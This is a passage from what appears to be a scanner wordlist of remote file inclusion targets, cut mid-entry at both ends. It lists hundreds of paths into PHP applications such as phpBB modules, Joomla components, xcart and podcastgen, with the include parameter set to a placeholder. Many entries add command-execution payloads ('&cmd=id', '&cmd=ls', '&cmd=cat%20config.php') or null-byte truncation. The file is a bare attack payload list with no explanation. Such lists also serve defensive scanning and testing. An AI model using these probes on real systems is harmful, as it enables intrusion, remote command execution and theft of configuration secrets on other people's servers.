php?config[root_ordner]=XXpathXX?&cmd=id\n/mkportal/include/user.php?MK_PATH=XXpathXX\n/mkportal/include/user.php?MK_PATH=XXpathXX?\n/mod/authent.php4?rootpath=XXpathXX\n/mod/image/index.php?config[pathMod]=XXpathXX\n/mod/liens/index.php?config[pathMod]=XXpathXX\n/mod/liste/index.php?config[pathMod]=XXpathXX\n/mod/special/index.php?config[pathMod]=XXpathXX\n/mod/texte/index.php?config[pathMod]=XXpathXX\n/mod_membre/inscription.php?chemin=XXpathXX?\n/mod_phpalbum/sommaire_admin.php?chemin=XXpathXX?\n/modernbill/include/html/config.php?DIR=XXpathXX\n/modifyform.html?code=XXpathXX\n/mods/business_functions.php?GALLERY_BASEDIR=XXpathXX\n/mods/config/load.inc.php?moddir=XXpathXX?\n/mods/http/load.inc.php?moddir=XXpathXX?\n/mods/ui_functions.php?GALLERY_BASEDIR=XXpathXX\n/module/forum/forum.php?fd=XXpathXX=';\n/module/forum/main.php?id=1&main_dir=XXpathXX?&\n/modules.php?name=XXpathXX&file=article&sid=2\n/modules/4nAlbum/public/displayCategory.php?basepath=XXpathXX\n/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=XXpathXX\n/modules/Calendar/admin/update.php?calpath=XXpathXX?\n/modules/Calendar/calendar.php?calpath=XXpathXX?\n/modules/Calendar/scheme.php?calpath=XXpathXX?\n/modules/Discipline/CategoryBreakdownTime.php?FocusPath=XXpathXX\n/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX\n/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX\n/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX\n/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX\n/modules/My_eGallery/index.php?basepath=XXpathXX\n/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX\n/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?\n/modules/NukeAI/util.php?AIbasedir=XXpathXX\n/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX\n/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX\n/modules/abook/foldertree.php?baseDir==XXpathXX?\n/modules/addons/plugin.php?doc_root=XXpathXX\n/modules/admin/include/config.php?doc_root=XXpathXX\n/modules/admin/include/localize.php?doc_root=XXpathXX\n/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id\n/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?\n/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX\n/modules/birstday/birst.php?exbb[home_path]=XXpathXX?\n/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?\n/modules/birstday/select.php?exbb[home_path]=XXpathXX?\n/modules/blocks/headerfile.php?system[path]=XXpathXX\n/modules/calendar/index.php?inc_dir=XXpathXX\n/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?\n/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?\n/modules/certinfo/index.php?full_path=XXpathXX\n/modules/character_roster/include.php?mod_root=XXpathXX?\n/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?\n/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX\n/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX\n/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX\n/modules/emails/index.php?full_path=XXpathXX\n/modules/events/index.php?full_path=XXpathXX\n/modules/fax/index.php?full_path=XXpathXX\n/modules/files/blocks/latest_files.php?system[path]=XXpathXX\n/modules/files/index.php?full_path=XXpathXX\n/modules/files/list.php?full_path=XXpathXX\n/modules/filters/headerfile.php?system[path]=XXpathXX\n/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?\n/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX\n/modules/global/inc/content.inc.php?sIncPath=XXpathXX?\n/modules/groupadm/index.php?full_path=XXpathXX\n/modules/groups/headerfile.php?system[path]=XXpathXX\n/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?\n/modules/history/index.php?full_path=XXpathXX\n/modules/home.module.php?repmod=XXpathXX?\n/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX\n/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX\n/modules/info/index.php?full_path=XXpathXX\n/modules/links/blocks/links.php?system[path]=XXpathXX\n/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX\n/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX\n/modules/log/index.php?full_path=XXpathXX\n/modules/mail/index.php?full_path=XXpathXX\n/modules/menu/headerfile.php?system[path]=XXpathXX\n/modules/messages/index.php?full_path=XXpathXX\n/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX\n/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX\n/modules/mod_calendar.php?absolute_path=XXpathXX\n/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX\n/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX\n/modules/mod_weather.php?absolute_path=XXpathXX?\n/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?\n/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX\n/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX\n/modules/news/blocks/latest_news.php?system[path]=XXpathXX\n/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?\n/modules/organizations/index.php?full_path=XXpathXX\n/modules/phones/index.php?full_path=XXpathXX\n/modules/pms/index.php?module_path=XXpathXX???\n/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX\n/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX\n/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?\n/modules/presence/index.php?full_path=XXpathXX\n/modules/projects/index.php?full_path=XXpathXX\n/modules/projects/list.php?full_path=XXpathXX\n/modules/projects/summary.inc.php?full_path=XXpathXX\n/modules/punish/p_error.php?exbb[home_path]=XXpathXX?\n/modules/punish/profile.php?exbb[home_path]=XXpathXX?\n/modules/reports/index.php?full_path=XXpathXX\n/modules/search/index.php?full_path=XXpathXX\n/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?\n/modules/settings/headerfile.php?system[path]=XXpathXX\n/modules/snf/index.php?full_path=XXpathXX\n/modules/syslog/index.php?full_path=XXpathXX\n/modules/tasks/index.php?full_path=XXpathXX\n/modules/tasks/searchsimilar.php?full_path=XXpathXX\n/modules/tasks/summary.inc.php?full_path=XXpathXX\n/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?\n/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX\n/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX\n/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX\n/modules/useradm/index.php?full_path=XXpathXX\n/modules/users/headerfile.php?system[path]=XXpathXX\n/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX\n/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?\n/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX\n/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX\n/modules/xfsection/modify.php?dir_module=XXpathXX\n/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX\n/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX\n/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?\n/modulistica/mdl_save.php?CLASSPATH=XXpathXX\n/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?\n/moodle/admin/utfdbmigrate.php?cmd=XXpathXX\n/moosegallery/display.php?type=XXpathXX?&cmd=[command]\n/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX\n/moteur/moteur.php?chemin=XXpathXX?\n/movie_cls.php?full_path=XXpathXX\n/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX\n/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?\n/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX\n/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX\n/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX\n/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX\n/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd\n/mysave.php?file=XXpathXX\n/naboard_pnr.php?skin=XXpathXX?\n/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX\n/network_module_selector.php?path_prefix=XXpathXX\n/news.php?CONFIG[script_path]=XXpathXX?\n/news.php?config[root_ordner]=XXpathXX?&cmd=id\n/news.php?scriptpath=XXpathXX?\n/news.php?vwar_root=XXpathXX\n/news/include/createdb.php?langfile;=XXpathXX?\n/news/include/customize.php?l=XXpathXX?\n/news/newstopic_inc.php?indir=XXpathXX\n/news/scripts/news_page.php?script_path=XXpathXX?\n/newsadmin.php?action=XXpathXX\n/newsarchive.php?path_to_script=XXpathXX?&cmd=ls\n/newsfeeds/includes/aggregator.php?zf_path=XXpathXX\n/newsfeeds/includes/controller.php?zf_path=XXpathXX\n/newsletter/newsletter.php?waroot=XXpathXX\n/newsp/lib/class.Database.php?path=XXpathXX?\n/newticket.php?lang=XXpathXX\n/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX\n/noticias.php?inc=XXpathXX?\n/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX\n/nuke_path/iframe.php?file=XXpathXX\n/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id\n/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?\n/oaboard_en/forum.php?inc=XXpathXX\n/ocp-103/index.php?req_path=XXpathXX\n/ocs/include/footer.inc.php?fullpath=XXpathXX?\n/ocs/include/theme.inc.php?fullpath=XXpathXX?\n/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?\n/olbookmarks-0.7.4/themes/test1.php?XXpathXX\n/oneadmin/adminfoot.php?path[docroot]=XXpathXX\n/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?\n/oneadmin/config-bak.php?include_once=XXpathXX\n/oneadmin/config.php?path[docroot]=XXpathXX\n/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?\n/online.php?config[root_ordner]=XXpathXX?&cmd=id\n/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?\n/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX\n/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???\n/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX\n/ops/gals.php?news_file=XXpathXX\n/order/login.php?svr_rootscript=XXpathXX\n/osData/php121/php121db.php?php121dir=XXpathXX%00\n/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?\n/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?\n/owimg.php3?path=XXpathXX\n/p-news.php?pn_lang=XXpathXX\n/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX\n/page.php?goto=XXpathXX\n/page.php?id=XXpathXX\n/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX\n/param_editor.php?folder=XXpathXX?\n/parse/parser.php?WN_BASEDIR=XXpathXX\n/patch/?language_id=XXpathXX\n/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?\n/paypalipn/ipnprocess.php?INC=XXpathXX?\n/pda/pda_projects.php?offset=XXpathXX\n/phfito/phfito-post?SRC_PATH=XXpathXX\n/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX\n/photo_comment.php?toroot=XXpathXX\n/php-inc/log.inc.php?SKIN_URL=XXpathXX\n/php-include-robotsservices.php?page=XXpathXX\n/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX\n/php.incs/common.inc.php?cm_basedir=XXpathXX?\n/php/init.gallery.php?include_class=XXpathXX/something\n/php121db.php?php121dir=XXpathXX%00\n/php4you.php?dir=XXpathXX?\n/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?\n/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX\n/phpCards.header.php?CardPath=XXpathXX?\n/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX\n/phpMyChat.php3?=XXpathXX?cmd=id\n/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?\n/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?\n/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX\n/phpbb/sendmsg.php?phpbb_root_path=XXpathXX\n/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?\n/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?\n/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX\n/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX\n/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX\n/phphd_downloads/common.php?phphd_real_path=XXpathXX\n/phphost_directoryv2/include/admin.php?rd=XXpathXX?\n/phphtml.php?htmlclass_path=XXpathXX\n/phpi/edit_top_feature.php?include_connection=XXpathXX\n/phpi/edit_topics_feature.php?include_connection=XXpathXX\n/phplib/site_conf.php?ordnertiefe=XXpathXX\n/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX\n/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX\n/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX\n/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?\n/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?\n/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?\n/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?\n/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX\n/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?\n/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?\n/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?\n/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?\n/phpress/adisplay.php?lang=XXpathXX\n/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?\n/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX\n/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX\n/phpyabs/moduli/libri/index.php?Azione=XXpathXX\n/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX\n/playlist.php?phpbb_root_path=XXpathXX\n/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?\n/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?\n/plugins/1_Adressbuch/delete.php?folder=XXpathXX\n/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?\n/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?\n/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?\n/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?\n/plugins/links/functions.inc?_CONF[path]=XXpathXX\n/plugins/polls/functions.inc?_CONF[path]=XXpathXX\n/plugins/rss_importer_functions.php?sitepath=XXpathXX?\n/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?\n/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?\n/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX\n/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX\n/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX\n/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX\n/plus.php?_pages_dir=XXpathXX?\n/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?\n/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX\n/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?\n/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX\n/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX\n/poll/view.php?int_path=XXpathXX\n/pollvote.php?pollname=XXpathXX?&cmd=ls\n/pop.php?base=XXpathXX\n/popup_window.php?site_isp_root=XXpathXX?\n/port.php?content=XXpathXX\n/portal/includes/portal_block.php?phpbb_root_path=XXpathXX\n/portal/portal.php?phpbb_root_path=XXpathXX?\n/portfolio.php?id=XXpathXX\n/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?\n/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX\n/prepare.php?xcart_dir=XXpathXX?\n/prepend.php?_PX_config[manager_path]=XXpathXX\n/preview.php?php_script_path=XXpathXX?&cmd=dir\n/principal.php?conteudo=XXpathXX\n/print.php?page=XXpathXX\n/print.php?pager=XXpathXX\n/print.php?print=XXpathXX?\n/process.php?DEFAULT_SKIN=XXpathXX\n/professeurs/index.php?repertoire_config=XXpathXX\n/profil.php?config[root_ordner]=XXpathXX?&cmd=id\n/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX\n/promocms/newspublish/include.php?path[bdocroot]=XXpathXX\n/protection.php?logout_page=XXpathXX?\n/provider/auth.php?xcart_dir=XXpathXX?\n/psynch/nph-psa.exe?css=XXpathXX\n/psynch/nph-psf.exe?css=XXpathXX\n/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?\n/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?\n/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX\n/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX\n/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?\n/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?\n/qte_web.php?qte_web_path=XXpathXX?\n/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]\n/quickie.php?QUICK_PATH=XXpathXX?&cmd=id\n/random2.php?path_to_folder=XXpathXX\n/randshop/index.php?incl=XXpathXX?\n/rdf.php?page[path]=XXpathXX?&cmd=ls\n/reactivate.php?base_dir=XXpathXX\n/read.php?data=XXpathXX?\n/readmore.php?config[\"sipssys\"]=XXpathXX\n/recent.php?insPath=XXpathXX\n/rechnung.php?_PHPLIB[libdir]=XXpathXX?\n/reconfig.php?GLOBALS[CLPath]=XXpathXX\n/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX\n/redirect.php?url=XXpathXX\n/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX\n/register.php?base_dir=XXpathXX\n/releasenote.php?mosConfig_absolute_path=XXpathXX\n/rempass.php?lang=XXpathXX\n/report.php?scriptpath=XXpathXX?\n/reports/who_r.php?bj=XXpathXX\n/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX\n/ressourcen/dbopen.php?home=XXpathXX?\n/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?\n/root/public/code/cp_html2txt.php?page=XXpathXX\n/routines/fieldValidation.php?jssShopFileSystem=XXpathXX\n/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX\n/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?\n/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX\n/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?\n/rss.php?page[path]=XXpathXX?&cmd=ls\n/rss.php?phpraid_dir=XXpathXX\n/rss.php?premodDir=XXpathXX\n/rss2.php?page[path]=XXpathXX?&cmd=ls\n/run.php?dir=SHELL?&file=XXpathXX\n/s01.php?shopid=XXpathXX\n/s01.php?shopid=XXpathXX?\n/s02.php?shopid=XXpathXX?\n/s03.php?shopid=XXpathXX?\n/s04.php?shopid=XXpathXX?\n/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX\n/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX\n/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX\n/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?\n/sample/xls2mysql/parser_path=XXpathXX?\n/save.php?file_save=XXpathXX\n/saveserver.php?thisdir=XXpathXX\n/script//ident/index.php?path_inc=XXpathXX\n/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?\n/script/common.inc.php?path_inc=XXpathXX\n/script/gestion/index.php?path_inc=XXpathXX\n/script/ident/disconnect.php?path_inc=XXpathXX\n/script/ident/ident.inc.php?path_inc=XXpathXX\n/script/ident/identification.php?path_inc=XXpathXX\n/script/ident/loginliste.php?path_inc=XXpathXX\n/script/ident/loginmodif.php?path_inc=XXpathXX\n/script/index.php?path_inc=XXpathXX\n/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX\n/script/menu/menuadministration.php?path_inc=XXpathXX\n/script/menu/menuprincipal.php?path_inc=XXpathXX\n/script/param/param.inc.php?path_inc=XXpathXX\n/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX\n/script/template/index.php?main_page_directory=XXpathXX\n/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX\n/script/tick/test.php?PATH_TO_CODE=XXpathXX\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?\n/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?\n/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX\n/scripts/check-lom.php?ETCDIR=XXpathXX\n/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?\n/scripts/lom_update.php?ETCDIR=XXpathXX\n/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?\n/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?\n/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?\n/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?\n/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX\n/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?\n/scripts/weigh_keywords.php?ETCDIR=XXpathXX\n/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?\n/search.php?config[\"sipssys\"]=XXpathXX\n/search.php?id=XXpathXX\n/search.php?insPath=XXpathXX\n/search/submit.php?config[\"sipssys\"]=XXpathXX\n/search_wA.php?LIBPATH=XXpathXX\n/searchbot.php?path=XXpathXX\n/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX\n/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?\n/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?\n/senetman/html/index.php?page=XXpathXX\n/services.php?page=XXpathXX\n/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00\n/settings.php?P[includes]=XXpathXX\n/settings_sql.php?path=XXpathXX\n/setup/inc/database.php?tcms_administer_site=XXpathXX\n/setup/upgrader.php?RootDirectory=XXpathXX\n/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX\n/shop/includes/header.inc.php?dateiPfad=XXpathXX\n/shop/index.php?action=XXpathXX?&cmd=cat%20config.php\n/shop/page.php?osCsid=XXpathXX?\n/shop/page.php?pageid=XXpathXX?\n/shoutbox.php?language=XXpathXX\n/shoutbox.php?root=XXpathXX?cmd=id\n/show.php?file=XXpathXX\n/show.php?id=XXpathXX\n/show.php?page=XXpathXX\n/show.php?path=XXpathXX\n/show_archives.php?cutepath=XXpathXX?\n/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX\n/sid=XXpathXX\n/signer/final.php?smiley=XXpathXX?\n/signin.php?sent=1&AMG_serverpath=XXpathXX\n/sinagb.php?fuss=XXpathXX\n/sinapis.php?fuss=XXpathXX\n/sitebar/Integrator.php?file=XXpathXX\n/sitebar/index.php?writerFile=XXpathXX\n/sitebuilder/admin/top.php?admindir=XXpathXX\n/sitemap.xml.php?dir[classes]=XXpathXX\n/skin/board/default/doctype.php?dir=XXpathXX\n/skin/dark/template.php?path=XXpathXX\n/skin/gold/template.php?path=XXpathXX\n/skin/html/table.php?pachtofile=XXpathXX\n/skin/original/template.php?path=XXpathXX\n/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX\n/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX\n/skins/default.php?dir_inc=XXpathXX\n/skins/header.php?ote_home=XXpathXX\n/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX\n/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX\n/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX\n/skysilver/login.tpl.php?theme=XXpathXX?\n/slogin_lib.inc.php?slogin_path=XXpathXX?\n/smarty.php?xcart_dir=XXpathXX?\n/smarty/smarty_class.php?_smarty_compile_path=XXpathXX\n/smilies.php?config=XXpathXX\n/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?\n/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?\n/snort/base_stat_common.php?BASE_path=XXpathXX\n/social_game_play.php?path=XXpathXX?\n/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX\n/song.php?phpbb_root_path=XXpathXX\n/source.php?bibtexrootrel=XXpathXX?\n/source/mod/rss/channeledit.php?Codebase=XXpathXX\n/source/mod/rss/post.php?Codebase=XXpathXX\n/source/mod/rss/view.php?Codebase=XXpathXX\n/source/mod/rss/viewitem.php?Codebase=XXpathXX\n/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX\n/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX\